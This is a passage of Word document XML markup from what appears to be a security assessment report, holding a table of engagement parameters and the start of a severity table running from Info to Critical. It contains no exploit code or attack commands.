              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22105A1B" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="685D801E" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="3338BD5C" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="00C24A8C" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Starting Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38B2822D" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>External</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="0B450772" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22C53C87" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target Criticality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03AFD32D" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="66ABE0C1" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="723B4653" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6705DAE8" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cautious &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Calculated</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="6BDB114B" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="279"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6ADA2A39" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="001E5C24">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessment Conspicuity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E92ABF1" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clear</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="5F1F3D81" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E3354CB" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3184" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2248D4FA" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attached wherever possible and applicable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5300A838" w14:textId="77777777" w:rsidR="000C1F7F" w:rsidRDefault="000C1F7F" w:rsidP="000C1F7F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc228687493"/>
      <w:bookmarkStart w:id="182" w:name="_Toc265516492"/>
      <w:bookmarkStart w:id="183" w:name="_Toc265518434"/>
      <w:bookmarkStart w:id="184" w:name="_Toc341868329"/>
      <w:bookmarkStart w:id="185" w:name="_Toc486603937"/>
      <w:bookmarkStart w:id="186" w:name="_Toc486605067"/>
      <w:bookmarkStart w:id="187" w:name="_Toc486846871"/>
      <w:bookmarkStart w:id="188" w:name="_Toc507421626"/>
    </w:p>
    <w:p w14:paraId="6EC193CC" w14:textId="77777777" w:rsidR="005F6208" w:rsidRDefault="005F6208" w:rsidP="005F6208"/>
    <w:p w14:paraId="7A2B5120" w14:textId="77777777" w:rsidR="005F6208" w:rsidRPr="005F6208" w:rsidRDefault="005F6208" w:rsidP="005F6208"/>
    <w:p w14:paraId="67CE10DC" w14:textId="0D2B247D" w:rsidR="00C52D3D" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Risk Calculation and Classification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
      <w:bookmarkEnd w:id="182"/>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
      <w:bookmarkEnd w:id="186"/>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="5EFD14FE" w14:textId="3B41D67B" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">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Following is the risk classification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45200E9C" w14:textId="7F5A81B7" w:rsidR="000E321B" w:rsidRPr="00D77DFE" w:rsidRDefault="000E321B" w:rsidP="00686E5B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00686E5B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Risk Rating</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="tex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93"/>
        <w:gridCol w:w="1720"/>
        <w:gridCol w:w="1694"/>
        <w:gridCol w:w="1694"/>
        <w:gridCol w:w="1692"/>
      </w:tblGrid>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="1EFFFD04" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:trHeight w:val="113"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E1B3B9A" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00686E5B">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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00B050"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65CA48ED" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00686E5B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C5C9EF7" w14:textId="6A5C0A1D" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00686E5B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="300"/>
                <w:tab w:val="center" w:pos="853"/>
              </w:tabs>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="284B2EAB" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00686E5B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="996" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="674A0DCA" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00686E5B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="1185C040" w14:textId="77777777" w:rsidTr="009E5B3F">
        <w:trPr>
          <w:trHeight w:val="2418"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1306" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1306"/>
            </w:tblGrid>
            <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="7FEB7EF1" w14:textId="77777777" w:rsidTr="00FA5020">
              <w:trPr>
                <w:trHeight w:val="1213"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="5D9A34E1" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="text"/>
                    <w:spacing w:after="0"/>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D77DFE">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No direct impact. Typically used for informational findings only.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="532D6B8A" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1013" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1504" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1504"/>
            </w:tblGrid>
            <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="1F006E61" w14:textId="77777777" w:rsidTr="00FA5020">
              <w:trPr>
                <w:trHeight w:val="1009"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="10837A88" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="text"/>
                    <w:spacing w:after="0"/>
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00D77DFE">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Minor impact or low probability of exploitation. Usually local or hard to exploit.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="2D243BFA" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1332" w:type="dxa"/>
              <w:tblCellSpacing w:w="15" w:type="dxa"/>
              <w:tblCellMar>
                <w:top w:w="15" w:type="dxa"/>
                <w:left w:w="15" w:type="dxa"/>
                <w:bottom w:w="15" w:type="dxa"/>
                <w:right w:w="15" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1332"/>
            </w:tblGrid>
            <w:tr w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w14:paraId="294613F7" w14:textId="77777777" w:rsidTr="00FA5020">
              <w:trPr>
                <w:trHeight w:val="1610"/>
                <w:tblCellSpacing w:w="15" w:type="dxa"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="621DB8C4" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00FA5020">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="text"/>
                    <w:spacing w:after="0"/>
                    <w:rPr>
